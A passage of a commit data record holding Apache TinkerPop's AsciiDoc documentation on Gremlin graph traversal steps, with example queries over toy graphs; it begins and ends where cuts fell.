documentation.\n","repos":"BrynCooke\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,apache\/tinkerpop,gdelafosse\/incubator-tinkerpop,krlohnes\/tinkerpop,mike-tr-adamson\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,pluradj\/incubator-tinkerpop,artem-aliev\/tinkerpop,vtslab\/incubator-tinkerpop,dalaro\/incubator-tinkerpop,artem-aliev\/tinkerpop,robertdale\/tinkerpop,gdelafosse\/incubator-tinkerpop,robertdale\/tinkerpop,newkek\/incubator-tinkerpop,pluradj\/incubator-tinkerpop,apache\/tinkerpop,edgarRd\/incubator-tinkerpop,artem-aliev\/tinkerpop,velo\/incubator-tinkerpop,newkek\/incubator-tinkerpop,jorgebay\/tinkerpop,pluradj\/incubator-tinkerpop,robertdale\/tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,samiunn\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/incubator-tinkerpop,krlohnes\/tinkerpop,velo\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,gdelafosse\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,apache\/tinkerpop,n-tran\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,PommeVerte\/incubator-tinkerpop,artem-aliev\/tinkerpop,dalaro\/incubator-tinkerpop,mike-tr-adamson\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,n-tran\/incubator-tinkerpop,edgarRd\/incubator-tinkerpop,RussellSpitzer\/incubator-tinkerpop,krlohnes\/tinkerpop,apache\/tinkerpop,dalaro\/incubator-tinkerpop,newkek\/incubator-tinkerpop,robertdale\/tinkerpop,PommeVerte\/incubator-tinkerpop,samiunn\/incubator-tinkerpop,jorgebay\/tinkerpop,apache\/tinkerpop,apache\/tinkerpop,robertdale\/tinkerpop,apache\/incubator-tinkerpop,BrynCooke\/incubator-tinkerpop,vtslab\/incubator-tinkerpop,velo\/incubator-tinkerpop,krlohnes\/tinkerpop,krlohnes\/tinkerpop,samiunn\/incubator-tinkerpop","old_file":"docs\/src\/the-traversal.asciidoc","new_file":"docs\/src\/the-traversal.asciidoc","new_contents":"\/\/\/\/\nLicensed to the Apache Software Foundation (ASF) under one or more\ncontributor license agreements. 
See the NOTICE file distributed with\nthis work for additional information regarding copyright ownership.\nThe ASF licenses this file to You under the Apache License, Version 2.0\n(the \"License\"); you may not use this file except in compliance with\nthe License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\/\/\/\/\n[[traversal]]\nThe Traversal\n=============\n\nimage::gremlin-running.png[width=125]\n\nAt the most general level there is `Traversal<S,E>` which implements `Iterator<E>`, where the `S` stands for start and the `E` stands for end. A traversal is composed of four primary components:\n \n . `Step<S,E>`: an individual function applied to `S` to yield `E`. Steps are chained within a traversal.\n . `TraversalStrategy`: interceptor methods to alter the execution of the traversal (e.g. query re-writing).\n . `TraversalSideEffects`: key\/value pairs that can be used to store global information about the traversal.\n . `Traverser<T>`: the object propagating through the `Traversal` currently representing an object of type `T`. \n\nThe classic notion of a graph traversal is provided by `GraphTraversal<S,E>` which extends `Traversal<S,E>`. `GraphTraversal` provides an interpretation of the graph data in terms of vertices, edges, etc. and thus, a graph traversal link:http:\/\/en.wikipedia.org\/wiki\/Domain-specific_language[DSL].\n\nIMPORTANT: The underlying `Step` implementations provided by TinkerPop should encompass most of the functionality required by a DSL author. It is important that DSL authors leverage the provided steps as then the common optimization and decoration strategies can reason on the underlying traversal sequence. If new steps are introduced, then common traversal strategies may not function properly.\n\n[[graph-traversal-steps]]\nGraph Traversal Steps\n---------------------\n\nimage::step-types.png[width=650]\n\nA `GraphTraversal<S,E>` is spawned from a `GraphTraversalSource`. It can also be spawned anonymously (i.e. empty) via `__`. A graph traversal is composed of an ordered list of steps. All the steps provided by `GraphTraversal` inherit from the more general forms diagrammed above. A list of all the steps (and their descriptions) are provided in the TinkerPop3 link:http:\/\/www.tinkerpop.com\/javadocs\/x.y.z\/core\/org\/apache\/tinkerpop\/gremlin\/process\/graph\/GraphTraversal.html[GraphTraversal JavaDoc]. The following subsections will demonstrate the GraphTraversal steps using the <<gremlin-console,Gremlin Console>>.\n\nNOTE: To reduce the verbosity of the expression, it is good to `import static org.apache.tinkerpop.gremlin.process.traversal.dsl.graph.__.*`. This way, instead of doing `__.inE()` for an anonymous traversal, it is possible to simply write `inE()`. Be aware of language-specific reserved keywords when using anonymous traversals. For example, `in` and `as` are reserved keywords in Groovy, therefore you must use the verbose syntax `__.in()` and `__.as()` to avoid collisions.\n\n[[lambda-steps]]\nLambda Steps\n~~~~~~~~~~~~\n\nCAUTION: Lambda steps are presented for educational purposes as they represent the foundational constructs of the Gremlin language. 
In practice, lambda steps should be avoided and traversal verification strategies exist to disallow their use unless explicitly \"turned off.\" For more information on the problems with lambdas, please read <<a-note-on-lambdas,A Note on Lambdas>>.\n\nThere are four generic steps by which all other specific steps described later extend.\n\n[width=\"100%\",cols=\"10,12\",options=\"header\"]\n|=========================================================\n| Step| Description\n| `map(Function<Traverser<S>, E>)` | map the traverser to some object of type `E` for the next step to process.\n| `flatMap(Function<Traverser<S>, Iterator<E>>)` | map the traverser to an iterator of `E` objects that are streamed to the next step.\n| `filter(Predicate<Traverser<S>>)` | map the traverser to either true or false, where false will not pass the traverser to the next step.\n| `sideEffect(Consumer<Traverser<S>>)` | perform some operation on the traverser and pass it to the next step.\n| `branch(Function<Traverser<S>,M>)` | split the traverser to all the traversals indexed by the `M` token.\n|=========================================================\n\nThe `Traverser<S>` object provides access to:\n\n . The current traversed `S` object -- `Traverser.get()`.\n . The current path traversed by the traverser -- `Traverser.path()`.\n .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.\n . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.\n . The number of objects represented by this traverser -- `Traverser.bulk()`.\n . The local data structure associated with this traverser -- `Traverser.sack()`.\n . The side-effects associated with the traversal -- `Traverser.sideEffects()`.\n .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.\n\nimage:map-lambda.png[width=150,float=right]\n[gremlin-groovy,modern]\n----\ng.V(1).out().values('name') <1>\ng.V(1).out().map {it.get().value('name')} <2>\n----\n\n<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.\n<2> The same operation, but using a lambda to access the name property values.\n\nimage:filter-lambda.png[width=160,float=right]\n[gremlin-groovy,modern]\n----\ng.V().filter {it.get().label() == 'person'} <1>\ng.V().hasLabel('person') <2>\n----\n\n<1> A filter that only allows the vertex to pass if it has an age-property.\n<2> The more specific `has()`-step is implemented as a `filter()` with respective predicate.\n\n\nimage:side-effect-lambda.png[width=175,float=right]\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').sideEffect(System.out.&println) <1>\n----\n\n<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.\n\nimage:branch-lambda.png[width=180,float=right]\n[gremlin-groovy,modern]\n----\ng.V().branch(values('name')).\n option('marko', values('age')).\n option(none, values('name')) <1>\ng.V().choose(has('name','marko'),\n values('age'),\n values('name')) <2>\n----\n\n<1> If the vertex is \"marko\", get his age, else get the name of the vertex.\n<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.\n\n[[addedge-step]]\nAddEdge Step\n~~~~~~~~~~~~\n\nlink:http:\/\/en.wikipedia.org\/wiki\/Automated_reasoning[Reasoning] is the process of making explicit what is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges. 
What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is determined by the traversal definition. For example, take the concept of a \"co-developer.\" Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of \"co-developers\" can be derived. Moreover, what was once implicit can be made explicit via the `addE()`-step (*map*\/*sideEffect*).\n\nimage::addedge-step.png[width=450]\n\n[gremlin-groovy,modern]\n----\ng.V(1).as('a').out('created').in('created').where(neq('a')).\n addE('co-developer').from('a').property('year',2009) <1>\ng.V(3,4,5).aggregate('x').has('name','josh').as('a').\n select('x').unfold().hasLabel('software').addE('createdBy').to('a') <2>\ng.V().as('a').out('created').addE('createdBy').to('a').property('acl','public') <3>\ng.V(1).as('a').out('knows').\n addE('livesNear').from('a').property('year',2009).\n inV().inE('livesNear').values('year') <4>\ng.V().match(\n __.as('a').out('knows').as('b'),\n __.as('a').out('created').as('c'),\n __.as('b').out('created').as('c')).\n addE('friendlyCollaborator').from('a').to('b').\n property(id,13).property('project',select('c').values('name')) <5>\ng.E(13).valueMap()\n----\n\n<1> Add a co-developer edge with a year-property between marko and his collaborators.\n<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.\n<3> Add an inverse createdBy edge for all created edges.\n<4> The newly created edge is a traversable object.\n<5> Two arbitrary bindings in a traversal can be joined `from()`->`to()`, where `id` can be provided for graphs that supports user provided ids.\n\n[[addvertex-step]]\nAddVertex Step\n~~~~~~~~~~~~~~\n\nThe `addV()`-step is used to add vertices to the graph (*map*\/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.\n\n[gremlin-groovy,modern]\n----\ng.addV('person').property('name','stephen')\ng.V().values('name')\ng.V().outE('knows').addV().property('name','nothing')\ng.V().has('name','nothing')\ng.V().has('name','nothing').bothE()\n----\n\n[[addproperty-step]]\nAddProperty Step\n~~~~~~~~~~~~~~~~\n\nThe `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it. Moreover, if `property()` follows an `addV()` or `addE()`, then it is \"folded\" into the previous step to enable vertex and edge creation with all its properties in one creation operation.\n\n[gremlin-groovy,modern]\n----\ng.V(1).property('country','usa')\ng.V(1).property('city','santa fe').property('state','new mexico').valueMap()\ng.V(1).property(list,'age',35) <1>\ng.V(1).valueMap()\ng.V(1).property('friendWeight',outE('knows').values('weight').sum(),'acl','private') <2>\ng.V(1).properties('friendWeight').valueMap() <3>\n----\n\n<1> For vertices, a cardinality can be provided for <<vertex properties,vertex-properties>>.\n<2> It is possible to select the property value (as well as key) via a traversal.\n<3> For vertices, the `property()`-step can add meta-properties.\n\n\n[[aggregate-step]]\nAggregate Step\n~~~~~~~~~~~~~~\n\nimage::aggregate-step.png[width=800]\n\nThe `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection. 
The step uses link:http:\/\/en.wikipedia.org\/wiki\/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http:\/\/en.wikipedia.org\/wiki\/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('created') <1>\ng.V(1).out('created').aggregate('x') <2>\ng.V(1).out('created').aggregate('x').in('created') <3>\ng.V(1).out('created').aggregate('x').in('created').out('created') <4>\ng.V(1).out('created').aggregate('x').in('created').out('created').\n where(without('x')).values('name') <5>\n----\n\n<1> What has marko created?\n<2> Aggregate all his creations.\n<3> Who are marko's collaborators?\n<4> What have marko's collaborators created?\n<5> What have marko's collaborators created that he hasn't created?\n\nIn link:http:\/\/en.wikipedia.org\/wiki\/Recommender_system[recommendation systems], the above pattern is used:\n \n \"What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?\"\n\nFinally, `aggregate()`-step can be modulated via `by()`-projection.\n\n[gremlin-groovy,modern]\n----\ng.V().out('knows').aggregate('x').cap('x')\ng.V().out('knows').aggregate('x').by('name').cap('x')\n----\n\n[[and-step]]\nAnd Step\n~~~~~~~~\n\nThe `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.\n\n[gremlin-groovy,modern]\n----\ng.V().and(\n outE('knows'),\n values('age').is(lt(30))).\n values('name')\n----\n\nThe `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.\n\nAn link:http:\/\/en.wikipedia.org\/wiki\/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.\n\n[gremlin-groovy,modern]\n----\ng.V().where(outE('created').and().outE('knows')).values('name')\n----\n\n[[as-step]]\nAs Step\n~~~~~~~\n\nThe `as()`-step is not a real step, but a \"step modulator\" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').select('a','b') <1>\ng.V().as('a').out('created').as('b').select('a','b').by('name') <2>\n----\n\n<1> Select the objects labeled \"a\" and \"b\" from the path.\n<2> Select the objects labeled \"a\" and \"b\" from the path and, for each object, project its name value.\n\nA step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('software').as('a','b','c').\n select('a','b','c').\n by('name').\n by('lang').\n by(__.in('created').values('name').fold())\n----\n\n[[barrier-step]]\nBarrier Step\n~~~~~~~~~~~~\n\nThe `barrier()`-step (*barrier*) turns the the lazy traversal pipeline into a bulk-synchronous pipeline. This step is useful in the following situations:\n\n * When everything prior to `barrier()` needs to be executed before moving onto the steps after the `barrier()` (i.e. 
ordering).\n * When \"stalling\" the traversal may lead to a \"bulking optimization\" in traversals that repeatedly touch many of the same elements (i.e. optimizing).\n\n[gremlin-groovy,modern]\n----\ng.V().sideEffect{println \"first: ${it}\"}.sideEffect{println \"second: ${it}\"}.iterate()\ng.V().sideEffect{println \"first: ${it}\"}.barrier().sideEffect{println \"second: ${it}\"}.iterate()\n----\n\nThe theory behind a \"bulking optimization\" is simple. If there are one million traversers at vertex 1, then there is no need to calculate one million `both()`-computations. Instead, represent those one million traversers as a single traverser with a `Traverser.bulk()` equal to one million and execute `both()` once. A bulking optimization example is made more salient on a larger graph. Therefore, the example below leverages the <<grateful-dead,Grateful Dead graph>>.\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\nclockWithResult(1){g.V().both().both().both().count().next()} <1>\nclockWithResult(1){g.V().repeat(both()).times(3).count().next()} <2>\nclockWithResult(1){g.V().both().barrier().both().barrier().both().barrier().count().next()} <3>\n----\n\n<1> A non-bulking traversal where each traverser is processed.\n<2> Each traverser entering `repeat()` has its recursion bulked.\n<3> A bulking traversal where implicit traversers are not processed.\n\nIf `barrier()` is provided an integer argument, then the barrier will only hold `n`-number of unique traversers in its barrier before draining the aggregated traversers to the next step. This is useful in the aforementioned bulking optimization scenario, but reduces the risk of an out-of-memory exception.\n\nThe non-default `LazyBarrierStrategy` inserts `barrier()`-steps in a traversal where appropriate in order to gain the \"bulking optimization.\"\n\n[gremlin-groovy]\n----\ngraph = TinkerGraph.open()\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(GraphTraversalSource.build().with(LazyBarrierStrategy.instance()).engine(StandardTraversalEngine.build()))\nclockWithResult(1){g.V().both().both().both().count().next()}\ng.V().both().both().both().count().iterate().toString() <1>\n----\n\n<1> With `LazyBarrierStrategy` activated, `barrier()` steps are automatically inserted where appropriate.\n\n[[by-step]]\nBy Step\n~~~~~~~\n\nThe `by()`-step is not an actual step, but instead is a \"step-modulator\" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. Some steps can only accept one `by()` while others can take an arbitrary amount.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(bothE().count()) <1>\ng.V().group().by(bothE().count()).by('name') <2>\ng.V().group().by(bothE().count()).by('name').by(count(local)) <3>\n----\n\n<1> `by(outE().count())` will group the elements by their edge count (*traversal*).\n<2> `by('name')` will process the grouped elements by their name (*element property projection*).\n<3> `by(count(local))` will count the number of elements in each group (*traversal*).\n\n[cap-step]]\nCap Step\n~~~~~~~~\n\nThe `cap()`-step (*barrier*) iterates the traversal up to itself and emits the sideEffect referenced by the provided key. 
If multiple keys are provided, then a `Map<String,Object>` of sideEffects is emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().groupCount('a').by(label).cap('a') <1>\ng.V().groupCount('a').by(label).groupCount('b').by(outE().count()).cap('a','b') <2>\n----\n\n<1> Group and count verticies by their label. Emit the side effect labeled 'a', which is the group count by label.\n<2> Same as statement 1, but also emit the side effect labeled 'b' which groups vertices by the number of out edges.\n\n[[coalesce-step]]\nCoalesce Step\n~~~~~~~~~~~~~\n\nThe `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.\n\n[gremlin-groovy,modern]\n----\ng.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)\ng.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)\ng.V(1).next().property('nickname', 'okram')\ng.V().hasLabel('person').coalesce(values('nickname'), values('name'))\n----\n\n[[count-step]]\nCount Step\n~~~~~~~~~~\n\nimage::count-step.png[width=195]\n\nThe `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).\n\n[gremlin-groovy,modern]\n----\ng.V().count()\ng.V().hasLabel('person').count()\ng.V().hasLabel('person').outE('created').count().path() <1>\ng.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>\n----\n\n<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.\n<2> The path of the traverser emanating from `count()` starts at `count()`.\n\nIMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.\n\n[[choose-step]]\nChoose Step\n~~~~~~~~~~~\n\nimage::choose-step.png[width=700]\n\nThe `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if\/else-based semantics as well as more complicated selections.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('age').is(lte(30)),\n __.in(),\n __.out()).values('name') <1>\ng.V().hasLabel('person').\n choose(values('age')).\n option(27, __.in()).\n option(32, __.out()).values('name') <2>\n----\n\n<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true\/false-based option selection).\n<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).\n\nHowever, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option('josh', values('name')).\n option('vadas', valueMap()).\n option('peter', label())\n----\n\nThe `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').\n choose(values('name')).\n option('marko', values('age')).\n option(none, values('name'))\n----\n\n[[coin-step]]\nCoin Step\n~~~~~~~~~\n\nTo randomly filter out a traverser, use the `coin()`-step (*filter*). 
The provided double argument biases the \"coin toss.\"\n\n[gremlin-groovy,modern]\n----\ng.V().coin(0.5)\ng.V().coin(0.0)\ng.V().coin(1.0)\n----\n\n[[constant-step]]\nConstant Step\n~~~~~~~~~~~~~\n\nTo specify a constant value for a traverser, use the `constant()`-step (*map*). This is often useful with conditional steps like <<choose-step,`choose()`-step>> or <<coalesce-step,`coalesce()`-step>>.\n\n[gremlin-groovy,modern]\n----\ng.V().choose(__.hasLabel('person'),\n __.values('name'),\n __.constant('inhuman')) <1>\ng.V().coalesce(\n __.hasLabel('person').values('name'),\n __.constant('inhuman')) <2>\n----\n\n<1> Show the names of people, but show \"inhuman\" for other vertices.\n<2> Same as statement 1 (unless there is a person vertex with no name).\n\n[[cyclicpath-step]]\nCyclicPath Step\n~~~~~~~~~~~~~~~\n\nimage::cyclicpath-step.png[width=400]\n\nEach traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclic()`-path should be used (*filter*). The step analyzes the path of the traverser thus far and if there are any repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.\n\n[gremlin-groovy,modern]\n----\ng.V(1).both().both()\ng.V(1).both().both().cyclicPath()\ng.V(1).both().both().cyclicPath().path()\n----\n\n[[dedup-step]]\nDedup Step\n~~~~~~~~~~\n\nWith `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.\n\n[gremlin-groovy,modern]\n----\ng.V().values('lang')\ng.V().values('lang').dedup()\ng.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>\n----\n\n<1> Traverse all `created` edges, but don't touch any edge twice.\n\nIf a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.\n\n[gremlin-groovy,modern]\n----\ng.V().valueMap(true, 'name')\ng.V().dedup().by(label).values('name')\n----\n\nFinally, if `dedup()` is provided an array of strings, then it will ensure that the de-duplication is not with respect to the current traverser object, but to the path history of the traverser.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out('created').as('b').in('created').as('c').select('a','b','c')\ng.V().as('a').out('created').as('b').in('created').as('c').dedup('a','b').select('a','b','c') <1>\n----\n\n<1> If the current `a` and `b` combination has been seen previously, then filter the traverser.\n\n[[drop-step]]\nDrop Step\n~~~~~~~~~\n\nThe `drop()`-step (*filter*\/*sideEffect*) is used to remove element and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.\n\n[gremlin-groovy,modern]\n----\ng.V().outE().drop()\ng.E()\ng.V().properties('name').drop()\ng.V().valueMap()\ng.V().drop()\ng.V()\n----\n\n[[fold-step]]\nFold Step\n~~~~~~~~~\n\nThere are situations when the traversal stream needs a \"barrier\" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this. 
Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n \"What is the distribution of ages in the graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n \"Iteratively walk the graph and count the number of times you see the second letter of each name.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). 
There are numerous variations on `has()` including:\n\n * `has(key,value)`: Remove the traverser if its element does not have the provided key\/value property.\n * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.\n * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.\n * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.\n * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.\n * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.\n * `has(key)`: Remove the traverser if its element does not have a value for the key.\n * `hasNot(key)`: Remove the traverser if its element has a value for the key.\n * `has(key, traversal)`: Remove the traverser if its object does not yield a result through the traversal off the property value.\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person')\ng.V().hasLabel('person').out().has('name',within('vadas','josh'))\ng.V().hasLabel('person').out().has('name',within('vadas','josh')).\n outE().hasLabel('created')\ng.V().has('age',inside(20,30)).values('age') <1>\ng.V().has('age',outside(20,30)).values('age') <2>\ng.V().has('name',within('josh','marko')).valueMap() <3>\ng.V().has('name',without('josh','marko')).valueMap() <4>\ng.V().has('name',not(within('josh','marko'))).valueMap() <5>\n----\n\n<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).\n<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).\n<3> Find all vertices whose names are exact matches to any names in the collection `[josh,marko]`, display all the key\/value pairs for those vertices.\n<4> Find all vertices whose names are not in the collection `[josh,marko]`, display all the key\/value pairs for those vertices.\n<5> Same as the prior example save using `not` on `within` to yield `without`.\n\nTinkerPop does not support a regular expression predicate, although specific graph databases that leverage TinkerPop may\nprovide a partial match extension.\n\n[[inject-step]]\nInject Step\n~~~~~~~~~~~\n\nimage::inject-step.png[width=800]\n\nOne of the major features of TinkerPop3 is \"injectable steps.\" This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel')\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}\ng.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()\n----\n\nIn the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. 
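\n\nThe same point can be seen without the intermediate `map()`; in this sketch over the same graph, the injected string's path contains only itself, while the graph-derived names carry their full traversal history.\n\n[gremlin-groovy,modern]\n----\ng.V(4).out().values('name').inject('daniel').path()\n----\n\n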
Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.\n\n[gremlin-groovy,modern]\n----\ninject(1,2)\ninject(1,2).map {it.get() + 1}\ninject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')\n----\n\n[[is-step]]\nIs Step\n~~~~~~~\n\nIt is possible to filter scalar values using `is()`-step (*filter*).\n\n[gremlin-groovy,modern]\n----\ng.V().values('age').is(32)\ng.V().values('age').is(lte(30))\ng.V().values('age').is(inside(30, 40))\ng.V().where(__.in('created').count().is(1)).values('name') <1>\ng.V().where(__.in('created').count().is(gte(2))).values('name') <2>\ng.V().where(__.in('created').values('age').\n mean().is(inside(30d, 35d))).values('name') <3>\n----\n\n<1> Find projects having exactly one contributor.\n<2> Find projects having two or more contributors.\n<3> Find projects whose contributors' average age is between 30 and 35.\n\n[[limit-step]]\nLimit Step\n~~~~~~~~~~\n\nThe `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.\n\n[gremlin-groovy,modern]\n----\ng.V().limit(2)\ng.V().range(0, 2)\ng.V().limit(2).toString()\n----\n\nThe `limit()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. The examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().valueMap().select('location').limit(local,2) <1>\ng.V().valueMap().limit(local, 1) <2>\n----\n\n<1> `List<String>` for each vertex containing the first two locations.\n<2> `Map<String, Object>` for each vertex, but containing only the first property value.\n\n[[local-step]]\nLocal Step\n~~~~~~~~~~\n\nimage::local-step.png[width=450]\n\nA `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.\n\n[gremlin-groovy,theCrew]\n----\ng.V().as('person').\n properties('location').order().by('startTime',incr).limit(2).value().as('location').\n select('person','location').by('name').by() <1>\ng.V().as('person').\n local(properties('location').order().by('startTime',incr).limit(2)).value().as('location').\n select('person','location').by('name').by() <2>\n----\n\n<1> Get the first two people and their respective location according to the most historic location start time.\n<2> For every person, 